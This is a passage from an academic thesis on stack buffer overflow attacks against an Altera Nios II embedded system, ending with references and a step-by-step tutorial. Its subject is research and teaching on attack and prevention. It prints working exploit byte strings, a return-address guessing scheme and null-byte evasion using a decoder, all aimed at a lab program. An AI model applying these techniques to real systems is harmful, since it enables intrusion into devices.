The exploit string in Figure 4.7 has NOPs at the beginning, followed by the exploit code and then the return address. Note that the return address '0x0081ab10' (=\x10\xab\x81\x00) in Figure 4.7 is the initial guess of the attacker. The exact address of the buffer can be a few hundred bytes above or below this address. Since the exploit string has 21 NOPs, the attacker can increase (attempts 2, 4, 6, 8 and 10 in Table 4.1 below) or decrease (attempts 3, 5, 7 and 9 in Table 4.1 below) the address '0x0081ab10' in steps of 84 (=21x4) bytes and test each result on the program in Figure 4.2 as an estimated return address.

Table 4.1 lists the various attempts carried out by the attacker. For attempts 1 through 9, the output of the program in Figure 4.2 is as shown in Figure 4.8. The output indicates a buffer overflow because the program has not terminated as expected (i.e., the second printf statement, in 'task1', is not executed), and the exploit is unsuccessful because the expected execution flow change has not been achieved.

Processing called function....!!

Figure 4.8: Program output for unsuccessful exploit string


Attempt #    Estimated return address    Status of the exploit
1            0x0081ab10                  Fail
2            0x0081ab64                  Fail
3            0x0081aabc                  Fail
4            0x0081abb8                  Fail
5            0x0081aa68                  Fail
6            0x0081ac0c                  Fail
7            0x0081aa14                  Fail
8            0x0081ac60                  Fail
9            0x0081a9c0                  Fail
10           0x0081acb4                  Success

Table 4.1: Exploit attempts with estimated return address
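The sequence of estimated return addresses in Table 4.1 follows a simple alternating pattern around the initial guess, which can be sketched as follows. The function name is our own; the step is the sled size in bytes (84 in this case).

```c
#include <stdint.h>

/* Attempt 1 returns base. Even attempts step upward and odd attempts step
 * downward, each by a growing multiple of step (the sled size in bytes). */
uint32_t candidate_address(uint32_t base, uint32_t step, unsigned attempt)
{
    if (attempt <= 1)
        return base;
    uint32_t k = attempt / 2;     /* attempts 2,3 -> 1; 4,5 -> 2; ... */
    return (attempt % 2 == 0) ? base + k * step : base - k * step;
}
```

With a base of 0x0081ab10 and a step of 84, attempt 2 gives 0x0081ab64, attempt 3 gives 0x0081aabc and attempt 10 gives 0x0081acb4, matching the entries in Table 4.1.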

The attacker succeeds on the 10th attempt. The exploit string in this case is shown in Figure 4.9 and the output of the vulnerable program in Figure 4.2 is shown in Figure 4.10.

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xb4\xac\x81\x00

Figure 4.9: Successful exploit string


Processing called function....!!
Hacked: The flow has been successfully changed

Figure 4.10: Program output for successful exploit string

4.4 The null byte problem

The work done by the instructions in Figure 4.4 can also be achieved using just a single Nios II 'jmpi 0x80030c' instruction. But, as shown in Figure 4.11, the 'jmpi 0x80030c' instruction when encoded (0x080030c1) contains a null byte.

Figure 4.11: Exploit string with null byte

In this scenario, the attacker can choose to replace the null byte with some arbitrary byte (say 'ff' as shown in Figure 4.11) before injecting the code. During program execution this byte is replaced with a null byte using the instructions in Figure 3.8. Section 3.4.3 explains why '-6' is used in the instruction 'stb r5,-6(sp)'. The value to be subtracted from the stack pointer (sp), 6 in this case, varies depending on the null byte position relative to sp.

Since the Altera Nios II is a pipelined processor, run time modification of the word 0x08ff30c1 to 0x080030c1 ('jmpi 0x80030c') by previous instructions results in a RAW (Read After Write) data hazard. Experimental analysis shows that there should be a gap of at least 4 cycles between the instructions that modify the exploit code and the exploit code itself. The exploit string modified to account for the RAW data hazard is shown in Figure 4.12.

Figure 4.12: Modified exploit string to avoid RAW hazard

The binary equivalent of the exploit string in Figure 4.12 is as shown in Figure 4.13. Note that the attacker is now using the estimated return address found in the 10th attempt in Table 4.1.


\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29
\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29
\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29
\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x85\xfe\x7f\xd9\x3a\xf0\x4a\x29
\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\xc1\x30\xff\x08\xb4\xac\x81\x00

Figure 4.13: Exploit string binary equivalent of Figure 4.12

One of the outputs of the vulnerable program in Figure 4.2 with the exploit string of Figure 4.13 is as shown in Figure 4.10. Occasionally, the 'critical_function' gets executed twice (or thrice) as shown in Figure 4.14.

Processing called function....!!
Hacked: The flow has been successfully changed
Hacked: The flow has been successfully changed

Figure 4.14: Multiple execution of 'critical_function'

A null byte in the exploit code can also be removed using the encoder/decoder approach discussed in section 3.4.4 and Figure 3.10. The exploit string in this case is shown in Figure 4.15. The two modifications to the decoder with respect to Figure 3.10 are:

• Since the exploit code is 20 (=5x4) bytes, the 'movi r7, 320' instruction moves the value '320' (=20x16) into r7 (refer to section 3.4.4 for details).

• The 'ldbu' and 'stb' instructions access data starting from the 24th byte (20 bytes of exploit code and 4 bytes of return address) from the stack pointer and continue until the encoded exploit code is exhausted.


Figure 4.15: Exploit string with an embedded decoder

Also note that the exploit string can now accommodate just 9 NOP instructions (as opposed to 21 in Figure 4.11) due to the decoder instructions. Consequently, the number of attempts required for a successful exploit (similar to Table 4.1) might increase.

The equivalent binary string of Figure 4.15 is shown in Figure 4.16.


\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29
\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x04\x50\xc0\x01
\x04\x01\xc0\x03\x3a\x88\x2b\xd8\x03\xfa\x7f\xa9\x3a\xf0\xca\x2b\x05\xfa\x7f\xa9
\x04\xfc\xff\x39\x44\x01\x40\xad\x04\xff\x7f\xad\x1e\xf9\x3f\x38\x3e\xf4\x4e\x2d
\x3e\xf4\x4e\x2d\x3e\xf4\x4e\x2d\x3e\xf4\x4e\x2d\xc5\x34\x04\x0c\xb4\xac\x81\x00

Figure 4.16: Exploit string binary equivalent of Figure 4.15

The output of the vulnerable program with this exploit string is the same as shown in Figure 4.10 and Figure 4.14.

4.5 Prevention

To prevent a successful exploit, as mentioned in section 3.5 and shown in Figure 3.13, the read/write data region of the program memory, which holds the function call stacks, is now allocated in an exclusive SRAM memory. In this case the initial stack address (i.e., the address obtained by executing the program in Figure 4.1) is

0x203938

Since the attack is now effectively prevented, the attacker cannot apply the Table 4.1 strategy to find the effective buffer address. For demonstration purposes, let us assume that 0x2038d4 is the effective buffer address (this address can be found using the Nios II IDE; refer to the tutorial section in the appendix). Figure 4.17 shows the exploit string of Figure 4.9 modified for the buffer address 0x2038d4.


\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xd4\x38\x20\x00

Figure 4.17: Exploit string for an exclusive SRAM Nios II system
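Only the last four bytes of the exploit string change when the target address changes. The following Python sketch illustrates that step under stated assumptions: the starting string is rebuilt from the byte values printed in this thesis (21 NOP words, three exploit words, and the SDRAM return address 0x0081acb4), and `patch_return_address` is a hypothetical helper, not a tool used in the experiments.

```python
import struct


def patch_return_address(payload, new_address):
    """Replace the last four bytes with new_address in little-endian order."""
    return payload[:-4] + struct.pack("<I", new_address)


# Byte values copied from the exploit strings printed in the text.
NOP = bytes.fromhex("3af04a29")
EXPLOIT = bytes.fromhex("34204001" "04c34029" "3ae83e28")

original = NOP * 21 + EXPLOIT + struct.pack("<I", 0x0081ACB4)
patched = patch_return_address(original, 0x002038D4)

print("".join("\\x%02x" % b for b in patched[-4:]))
```

The printed tail corresponds to the final four bytes of the Figure 4.17 string; everything before it is unchanged.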

The output of the vulnerable program (Figure 4.2) for the exploit string of Figure 4.17 is shown in Figure 4.8. The output indicates a buffer overflow but an unsuccessful exploit.

Though the attacker might not know why the attack is unsuccessful, the developer can find out what went wrong with the program execution. The Nios II IDE has a feature called ‘Instruction Trace’, which traces the instructions being executed, one at a time. When the PC enters the SRAM memory region, the trace shows the following error:

ERROR: address 2038d4 is not in Memory

The message implies that the instruction currently being fetched (which is located at buffer address 0x2038d4 in the stack region) is not in the Instruction Memory region. Figure 4.18 shows the instruction trace as seen in Nios II IDE.
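The effect of the bus arrangement can be pictured with a toy model in Python. This is a sketch under loud assumptions: the address ranges below are hypothetical, chosen only so that the addresses quoted in this chapter fall inside them (the real memory map comes from SOPC Builder), and `fetch` merely imitates the trace message rather than reproducing the Nios II hardware behavior.

```python
from collections import namedtuple

Region = namedtuple("Region", "name start end on_instruction_bus")

# Hypothetical address ranges (assumption, not taken from the real system).
MEMORY_MAP = [
    Region("sdram", 0x00800000, 0x00FFFFFF, True),
    Region("sram", 0x00200000, 0x0027FFFF, False),  # data bus only
]


def fetch(address):
    """Return the region an instruction fetch hits, or fail like the trace."""
    for region in MEMORY_MAP:
        in_range = region.start <= address <= region.end
        if in_range and region.on_instruction_bus:
            return region.name
    raise LookupError("ERROR: address %x is not in Memory" % address)


print(fetch(0x0080030C))  # code in SDRAM can be fetched
try:
    fetch(0x002038D4)     # stack buffer in SRAM cannot
except LookupError as exc:
    print(exc)
```

In this model the stack buffer is still readable and writable as data; only instruction fetches from it fail, which is why the overflow itself still occurs while the injected code never runs.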


Figure 4.18: Instruction trace showing error fetching instruction

4.6 Summary

This chapter described how to carry out an execution flow change using a buffer overflow vulnerability, how to overcome null bytes in the exploit code, and how to prevent a successful stack based buffer overflow attack when using the Nios II processor. The tutorial section in the appendix describes how to use the Nios II IDE and Quartus II tools to implement the attack and its prevention.


5. CONCLUSIONS AND FUTURE WORK

5.1 Conclusions

We briefly discussed various embedded systems security attacks. We then discussed in detail a class of software based attacks, buffer overflow attacks. A step-by-step procedure for carrying out a stack based buffer overflow attack was presented. These attacks are important to study due to their popularity and relative ease of implementation.

The attack was demonstrated using a specimen embedded system with the Altera Nios II softcore processor and the Micrium MicroC/OS II RTOS kernel. Exploit code encoding and the NOP sled technique were used to carry out the attack. We also presented a method to prevent the attack under the given system constraints (virtual memory support, processor buses).

Conceptually, stack based buffer overflow attacks are simple, but their implementation demands advanced knowledge of the processor architecture and the operating system.

Hence, we conclude that it is important for the designer to be aware of the security aspects of the components used in the embedded system and to apply appropriate preventive measures to mitigate security attacks.

5.2 Future Work

This work demonstrates a stack based buffer overflow attack and a simple hardware based preventive measure. Modifying the Micrium MicroC/OS II operating system kernel, with or without virtual memory support, as a prevention measure is one of the future research goals.

Further, future work should also address the other types of software attacks that need to be considered while designing a secure embedded system. Developing security protocols for specific example systems is also of interest.


REFERENCES

1. Altera Corporation, “Nios II Processor Reference Handbook”, December 2010

2. Aleph One, “Smashing the stack for fun and profit”, Phrack 49, http://insecure.org/stf/smashstack.html, date accessed April 2011

3. CERN, “Common vulnerabilities guide for C programmers”, http://security.web.cern.ch/security/recommendations/en/codetools/c.shtml, date accessed April 2011

4. Cowan, C., Wagle, P., Pu, C., Beattie, S. and Walpole, J., “Buffer overflows: attacks and defenses for the vulnerability of the decade”, DARPA Information Survivability Conference and Exposition, 2000

5. Foster, J., Osipov, V. and Bhalla, N., Buffer Overflow Attacks: Detect, Exploit, Prevent, Syngress Publishing, 2005

6. Kaempf, M., “Vudo malloc tricks”, Phrack 57, http://www.phrack.org/issues.html?issue=57&id=8, August 2001, date accessed April 2011

7. Labrosse, J., MicroC OS II: The Real Time Kernel, CMP Books, 2002

8. http://www.altera.com/products/ip/processors/nios2/tools/embed-partners/micrium/emb-micrium.html, date accessed April 2011

9. Bhatkar, S., Duvarney, D. and Sekar, R., “Address obfuscation: an efficient approach to combat a broad range of memory error exploits”, Proceedings of the 12th USENIX Security Symposium, 2003

10. “Apache htpasswd buffer overflow”, http://xforce.iss.net/xforce/xfdb/17413, date accessed April 2011

11. “Apache 1.3.37 htpasswd is vulnerable to buffer overflow vulnerability”, https://issues.apache.org/bugzilla/show_bug.cgi?id=41279, date accessed April 2011

12. http://en.wikipedia.org/wiki/Buffer_overflow#History_of_exploitation, date accessed April 2011

13. Altera Corporation, SOPC Builder User Guide, December 2010

14. Parameswaran, S. and Wolf, T., “Embedded systems security - an overview”, Design Automation for Embedded Systems, Sep 2008

15. Kc, G.S., Keromytis, A.D. and Prevelakis, V., “Countering code-injection attacks with instruction-set randomization”, Proceedings of the 10th ACM Conference on Computer and Communications Security, 2003

16. Jim, T., Morrisett, G., Grossman, D., Hicks, M., Cheney, J. and Wang, Y., “Cyclone: A Safe Dialect of C”, Proceedings of the General Track of the USENIX Annual Technical Conference (ATEC '02), 2002

17. http://www.usenix.org/events/sec02/full_papers/lhee/lhee_html/node7.html, date accessed April 2011

18. SolarDesigner, “Linux kernel patch from the Openwall Project”, http://www.openwall.com/linux/README.shtml, date accessed April 2011

19. Cowan, C., Maier, D., Hinton, H., Bakke, P., Grier, A., Wagle, P., Pu, C., Beattie, S., Zhang, Q. and Walpole, J., “StackGuard: automatic adaptive detection and prevention of buffer-overflow attacks”, 7th USENIX Security Conference, 1998

20. Noordergraaf, A. and Watson, K., “Solaris Operating Environment Security”, http://www.sun.com/blueprints/0100/security.pdf, date accessed April 2011

21. strcpy, http://www.cplusplus.com/reference/clibrary/cstring/strcpy/, date accessed April 2011

22. strcmp, http://www.cplusplus.com/reference/clibrary/cstring/strcmp/, date accessed April 2011

23. strcat, http://www.cplusplus.com/reference/clibrary/cstring/strcat/, date accessed April 2011

24. Parameswaran, S. and Wolf, T., “Embedded systems security - an overview”, Design Automation for Embedded Systems, Sep 2008

25. Ravi, S., Raghunathan, A. and Chakradhar, S., “Tamper resistance mechanisms for secure, embedded systems”, 17th International Conference on VLSI Design, January 2004

26. Ravi, S., Raghunathan, A., Kocher, P. and Hattangady, S., “Security in embedded systems: design challenges”, ACM Transactions on Embedded Computing Systems, 3(3), 461-491, 2004

27. Arora, D., Ravi, S., Raghunathan, A. and Jha, N.K., “Secure embedded processing through hardware assisted runtime monitoring”, Proceedings of the Design, Automation and Test in Europe (DATE '05), 2005

28. Nedjah, N., Mourelle, L. and Martins da Silva, R., “Efficient hardware for modular exponentiation using the sliding-window method”, Proceedings of the International Conference on Information Technology, 17-24, 2007

29. May, D., Muller, H.L. and Smart, N.P., “Non-deterministic processors”, Proceedings of the 6th Australasian Conference on Information Security and Privacy, 115-129, 2001

30. Akkar, M. and Giraud, C., “An implementation of DES and AES, secure against some attacks”, Proceedings of Cryptographic Hardware and Embedded Systems, 309-318, 2001

31. Chevallier-Mames, B., Ciet, M. and Joye, M., “Low-cost solutions for preventing simple side-channel analysis: side-channel atomicity”, IEEE Transactions on Computers, 53(6), 760-768, 2004

32. Kocher, P., Lee, R., McGraw, G. and Raghunathan, A., “Security as a new dimension in embedded system design”, Proceedings of the 41st Annual Design Automation Conference (DAC '04), 753-760, 2004

33. Rohatgi, P., “Electromagnetic Attacks and Countermeasures”, Cryptographic Engineering, Springer US, 407-430, 2009

34. Kuhn, M., “The TrustNo 1 Cryptoprocessor Concept”, CS555 Report, Purdue University, 1997

35. McLoughlin, I., “Secure embedded systems: the threat of reverse engineering”, 14th IEEE International Conference on Parallel and Distributed Systems (ICPADS '08), 2008

36. Kömmerling, O. and Kuhn, M., “Design principles for tamper-resistant smartcard processors”, Proceedings of the USENIX Workshop on Smartcard Technology, 1999

37. Feng, J. and Seel, J., “Design security with waveforms”, White Paper by Altera, http://www.altera.co.jp/literature/cp/cp_sdr_design_security.pdf

38. Messier, M. and Viega, J., “Safe C string library”, available at http://www.zork.org/safestr/, date accessed April 2011

39. Ozdoganoglu, H., Vijaykumar, T.N., Brodley, C., Kuperman, B. and Jalote, A., “SmashGuard: A hardware solution to prevent security attacks on the function return address”, IEEE Transactions on Computers, 55(10), 1271-1285, 2006

40. Shacham, H., Page, M., Pfaff, B., Goh, E.J., Modadugu, N. and Boneh, D., “On the Effectiveness of Address-Space Randomization”, Proceedings of the 11th ACM Conference on Computer and Communications Security, 298-307, 2004

41. Buffer Overflows, http://www.freebsd.org/doc/en/books/developers-handbook/secure-bufferov.html, date accessed April 2011

42. CERT® Advisory CA-2003-04 MS-SQL Server Worm, http://www.cert.org/advisories/CA-2003-04.html, date accessed April 2011

43. Perl: Buffer overflow, http://www.gentoo.org/security/en/glsa/glsa-200711-28.xml, date accessed April 2011

44. “Apache <= 1.3.33 htpasswd local overflow”, http://www.vulnerabilityscanning.com/Apache-1-3-33-htpasswd-local-overflow-Test_14771.htm, date accessed April 2011

45. “Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability”, http://www.securityfocus.com/bid/13777/discuss, date accessed April 2011

46. ftp://ftp.ovh.net/made-in-ovh/clickandsee/apache_1.3.24/src/support/htpasswd.c, date accessed April 2011

47. PaX, http://pax.grsecurity.net/docs/aslr.txt, date accessed April 2011

48. UP3 Education Board, http://www.altera.com/education/univ/materials/boards/unv-up3-board.html, date accessed April 2011

49. Tong, J.G., Anderson, I.D.L. and Khalid, M.A.S., “Soft-core processors for embedded systems”, The 18th International Conference on Microelectronics (ICM), 2006

50. µC/OS-II Kernel, http://www.micrium.com/page/products/rtos/os-ii, date accessed April 2011

51. Shao, Z., Zhuge, Q., He, Y. and Sha, E., “Defending embedded systems against buffer overflow via hardware/software”, Proceedings of the 19th Annual Computer Security Applications Conference, 2003

52. Embedded Systems/C Programming, http://en.wikibooks.org/wiki/Embedded_Systems/C_Programming, date accessed April 2011

53. Ogorkiewicz, M. and Frej, P., “Analysis of Buffer Overflow Attacks”, http://www.windowsecurity.com/articles/analysis_of_buffer_overflow_attacks.html, 2002

54. Gerg, I., “An overview and example of the buffer-overflow exploit”, IAnewsletter, Spring 2005, http://iac.dtic.mil/iatac/download/Vol7_No4.pdf

55. execve(2) - Linux man page, http://linux.die.net/man/2/execve, date accessed April 2011

56. Altera Corporation, “Nios II Software Developer’s Handbook”, February 2011

57. Brumley, D., Chiueh, T., Johnson, R., Lin, H. and Song, D., “RICH: Automatically protecting against integer-based vulnerabilities”, Symposium on Network and Distributed Systems Security, 2007

58. “Options to Request or Suppress Warnings”, http://gcc.gnu.org/onlinedocs/gcc-4.1.2/gcc/Warning-Options.html#Warning-Options, date accessed April 2011

59. Ringenburg, M. and Grossman, D., “Preventing format-string attacks via automatic and efficient dynamic checking”, Proceedings of the 12th ACM Conference on Computer and Communications Security, 2005

60. Cowan, C., Beattie, S., Barringer, M., Kroah-Hartman, G., Frantzen, M. and Lokier, J., “FormatGuard: automatic protection from printf format string vulnerabilities”, Proceedings of the 10th USENIX Security Symposium, 2001

61. Howard, M., “Safe integer arithmetic in C”, http://blogs.msdn.com/b/michael_howard/archive/2006/02/02/523392.aspx, 2006, date accessed April 2011

62. Gueron, S., “Intel® Advanced Encryption Standard (AES) Instructions Set”, White Paper, 2010, http://software.intel.com/en-us/articles/intel-advanced-encryption-standard-aes-instructions-set/, date accessed April 2011

63. http://www.cert.org/homeusers/buffer_overflow.html, date accessed April 2011

64. http://www.eeye.com/Resources/Security-Center/Research/Security-Advisories/AL20010717, date accessed April 2011

65. http://www.microsoft.com/technet/security/bulletin/ms02-039.mspx, date accessed April 2011

66. http://en.wikipedia.org/wiki/Twilight_hack, date accessed April 2011

67. http://en.wikipedia.org/wiki/PS2_Independence_Exploit#PlayStation_2, date accessed April 2011

68. http://www.us-cert.gov/cas/techalerts/index.html, date accessed April 2011

69. http://www.sans.org/top-cyber-security-risks/trends.php, date accessed April 2011

70. http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx, date accessed April 2011

71. Silberschatz, A., Galvin, P. and Gagne, G., Operating Systems Concepts, John Wiley & Sons, 82, 2005

72. http://www.infosecwriters.com/texts.php?op=display&id=150, date accessed April 2011

73. Hamblen, J., Hall, T. and Furman, M., Rapid Prototyping of Digital Systems, Quartus(R) Edition, Springer, 2008

74. ICS-CERT Advisory, http://www.us-cert.gov/control_systems/pdf/ICSA-11-161-01.pdf, date accessed June 2011

75. http://en.wikipedia.org/wiki/Harvard_architecture, date accessed June 2011

76. Hennessy, J., Patterson, D. and Arpaci-Dusseau, A., Computer Architecture: A Quantitative Approach, 4th Edition, Appendix K, Morgan Kaufmann.

APPENDIX A

Tutorial for Buffer Overflow Attack and Prevention in Embedded Systems

Amjad Basha Sikiligiri

July 2011

This tutorial presents a step-by-step implementation procedure for stack based buffer overflow attacks. The steps involved are:

1. Confirm that the application is buffer overflow vulnerable

2. Find the effective buffer length

3. Find the approximate address of the buffer

4. Develop and inject the exploit string

This tutorial is based on version 10.1 of Altera Quartus II, version 10.1 of the Altera Nios II IDE, and the Altera UP3 board. Some details may need to be modified for newer versions or other prototyping boards.

A.1 Nios II system

Chapter 17 of “Rapid Prototyping of Digital Systems” [73] describes the Nios II processor hardware design using Altera’s SOPC Builder. SOPC Builder is a GUI-based hardware design tool used to configure the Nios II processor core, bus and I/O interfaces.

The design files can be found on the companion DVD (the folder name is CHAP17). These files are the starting point for this tutorial. Copy the CHAP17 folder from the DVD into your working directory (for example, C:\Demo).


Run the Quartus II tool (version 10.1) installed on your system. From the “File” menu, use “Open Project” to open rpds17.qpf, located at C:\Demo\CHAP17\complete. Double click on the “rpds17” entity in the “Project Navigator” pane. This displays the Nios II system schematic with the Nios32, up3_pll and up3_bus_mux design blocks. Double click on the Nios32 design block to open the SOPC Builder GUI. A pop-up message will ask to “Upgrade Project File”; click on “Open in Classic” instead.

This opens the Nios II system in a GUI as shown in Figure A.1. The figure indicates that the sram and lcd components are not installed. To install them, move the up3_tristate_lcd and up3_tristate_sram folders located at C:\Demo\CHAP17 into C:\Demo\CHAP17\complete. Now close and reopen SOPC Builder as before to confirm that the sram and lcd components are installed.

Figure A.1: Nios II system with all its components


Figure A.1 also shows that both the instruction bus and the data bus are connected to the SDRAM, Flash and SRAM memories through different master and slave ports. The attack steps listed at the beginning of this tutorial can be performed on this default Nios II system (which you may have used in your other projects). This system does not provide system-level protection from stack based “code injection” buffer overflow attacks.

In this tutorial we prevent a successful buffer overflow attack by first designing a system with the SRAM memory connected to the data bus alone and then allocating function call stacks in this memory region. To obtain a Nios II system with the SRAM memory connected to the data bus alone, disconnect the instruction bus from avalon_slave by left clicking on the interconnect. The resulting system is shown in Figure A.2.

Figure A.2: Nios II system with SRAM connected to data bus alone


To aid in debugging, we will add a debug feature called “Instruction Trace”. Click on the “cpu” module name to open another GUI window for configuring the Nios II CPU (Figure A.3). In this GUI, click on “JTAG Debug Module”, select “Level 3” and click “Finish”.

Figure A.3: Nios II Instruction Trace debug feature

Click “Next >” and change the “Reset Address” and “Exception Address” to the “sdram/s1” memory module. Generate this system by clicking on the “Generate” button at the bottom of the current window as shown in Figure A.4. Make sure that the system is generated successfully.

Figure A.4: Nios II system generation

Close the SOPC builder and compile (Ctrl + L) the system using the Quartus II tool. Make sure that the system compilation is error free.

The compiled system (which is the same as the one in Figure A.2) is then used to program Altera’s Cyclone FPGA in the UP3 Educational kit. To do this, first connect the UP3 board to your PC using the ByteBlaster II cable. Then run the Nios II IDE (version 10.1) installed on your system, or launch it from Start->Altera->Nios II EDS 10.1 sp1->Legacy Nios II tools->Nios II 10.1 IDE.

From the “Tools” tab in the Nios II IDE, click on “Quartus II programmer”. In the “Quartus II programmer” GUI, choose “ByteBlaster II” from “Hardware Setup”. Then from the “File” menu open the file “rpds17_time_limited.sof” located at C:\Demo\CHAP17\complete. Click on the “Start” button to program the FPGA with the Nios II system we built earlier (Figure A.2). Refer to Figure A.5 for FPGA programming directions.

Figure A.5: Programming the Cyclone FPGA

This completes the Nios II system design which can be resistant to “code injection attacks”, unlike the standard system.


A.2 Attack steps

Ideally, the attacker would employ the following steps to target the system shown in Figure A.1. By default, in the Nios II IDE, all the process memory regions (stack, heap, code, etc.) are allocated in SDRAM memory (which is connected to the instruction bus and the data bus in both Figures A.1 and A.2). Hence even the Figure A.2 system is vulnerable when the function call stack region is accessible to the instruction bus. For the sake of simplicity we will use the system in Figure A.2 to implement the “code injection” attack and then show how to prevent a successful “code injection” attack.

A.2.1 Approximate address of the buffer

Since the buffer is present in the function call stack region, approximate stack starting address serves as a good starting point. This is because, for a given processor and operating system, function call stacks start at approximately the same memory address for all programs.

Using the Nios II IDE, create a new “Nios II C/C++ application” from the “File” menu. As shown in Figure A.6, name the project “Initial_address”. Select nios32.ptf from C:\Demo\CHAP17\complete for “SOPC Builder System PTF File”.

In the “Select Project Template” pane, click on the “Blank Project” template. Click “Next”. Then click on “Select or create a system library” and “New System Library Project”. Name the system library “address_lib”, select MicroC/OS II as the type of RTOS as shown in Figure A.7 and click “Finish”.


Figure A.6: Nios II project creation

Figure A.7: MicroC/OS II system library creation

In the “Nios II C/C++ Projects” pane, right click on “Initial_address” and create a new source file named “Initial_address.c”. Copy the code from Figure 4.1 into Initial_address.c and save.

To compile and download the “Initial_address.c” program onto the Nios II system, right click on “Initial_address” in the “Nios II C/C++ Projects” pane and select “Run As => Nios II Hardware”. The program displays “0x81ab10” on the console as the stack address. This is the approximate address where the buffer is located.

A.2.2 The vulnerable application

Similar to Section A.2.1, create another “Nios II C/C++ application” named “Vulnerable_program” with the program code in Figure 4.2. Compile and download this program as described in Section A.2.1. The output should be:

Processing called function....!! In main function executed assignment of x. The value of x is 1

Note that since the “critical_function” was never called, it was not executed.

A.2.3 Is the application buffer overflow vulnerable?

This can be verified by compiling the “Vulnerable_program” with a long string of input as an argument to the “process_input” function. The application malfunctions when a sufficiently long string is set as an argument to the “process_input” function, hence indicating that the application is vulnerable to buffer overflow. In reality the argument (i.e., the attacker input) can come in various forms [39], such as


• User input:

o Typing into a web browser in the case of web servers.

o Command line argument passing in the case of workstations, etc.

o Program reading input from a file, as happened in the “Twilight Hack” exploit (the buffer overflow was due to the horse name saved in the file).

o Interactive programs which ask for a user name or file name.

• Network connection: Most modern embedded systems are networked, and hence the network packets used to communicate are also a way to inject exploit code.

• Environment variables: programs that try to locate a file using environment variables.

A.2.4 Effective buffer length

Similar to Section A.2.3, compile the “Vulnerable_program” while gradually increasing the length of the argument passed to “process_input” until it malfunctions. One such string is

‘123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456’,

of length 96 bytes. But the attacker also has to consider the null byte which gets appended at the end of each string. Hence the effective length is 96 + 1 = 97 bytes.

Also, C compilers allocate memory in multiples of the word size (4 bytes for Nios II), implying that the effective buffer length is 100 bytes.
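The arithmetic above can be written as a small Python sketch. It is only an illustration of the rounding step; the function name is hypothetical, and the word size of 4 bytes is the value stated above for Nios II.

```python
WORD_SIZE = 4  # bytes per word on Nios II, as stated in the text


def effective_buffer_length(visible_chars, word_size=WORD_SIZE):
    """Add the terminating null byte, then round up to a whole word."""
    with_null = visible_chars + 1
    # Ceiling division without floating point.
    return -(-with_null // word_size) * word_size


test_string = "1234567890" * 9 + "123456"  # the 96-character string above
print(len(test_string), effective_buffer_length(len(test_string)))
```

For the 96-character string this gives 97 bytes with the null terminator, rounded up to 100 bytes.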

A.2.5 Develop and inject the exploit string

The attack aims at dynamically changing the execution flow by executing the “critical_function” (which should never be executed under normal conditions) with the help of a stack based buffer overflow. Conventionally the attack involves spawning a new shell by exploiting the buffer overflow in a privileged program [2, 4]. In either case, the exploit makes use of the fact that instructions can be executed from the stack region of the process memory.

Execution flow change is achieved by exploiting the argument passed in the program to the “process_input” function. This argument is later copied into the called function’s local buffer, which resides in the stack memory region. Hence the program is vulnerable to buffer overflow.

In order to change the execution flow and direct it to the “critical_function”, we need to know the address of “critical_function” in memory. Finding the address of “critical_function” is analogous to finding the address of system calls. Generally this is accomplished using gdb (the GNU debugger), ltrace or similar tools [5, 72]. The fact that libc functions keep the same address in memory until recompiled [72] also makes this step easier.

In this tutorial, we use the Nios II command shell to find the address of “critical_function”. To accomplish this, we first need to generate the Executable and Linkable Format (.elf) file of the vulnerable program. This can be done by right clicking on “Vulnerable_program” in the “Nios II C/C++ Projects” pane and selecting “Build Project”.

Now run the “Nios II Command Shell” (from Start->Altera->Nios II EDS 10.1 sp1->Nios II Command Shell). At the shell prompt, enter “cd /cygdrive/C/Demo/CHAP17/complete/software/Vulnerable_program/Debug/”. This folder contains the “Vulnerable_program.elf” file. Enter “nios2-elf-objdump -dS Vulnerable_program.elf > assembly.txt”. This command disassembles the .elf file into assembly level instructions along with their addresses in the program code address space. The resulting file indicates that the “critical_function” is present at the memory address “0x0080030c”. Hence we can now use the following three instructions to make the Nios II processor jump to “critical_function” (assuming r5 is initially zero).


Assembly instructions        Binary equivalent
xorhi r5, r5, 0x0080         0x4940203c
addi r5, r5, 0x030c          0x2940c304
callr r5                     0x283ee83a
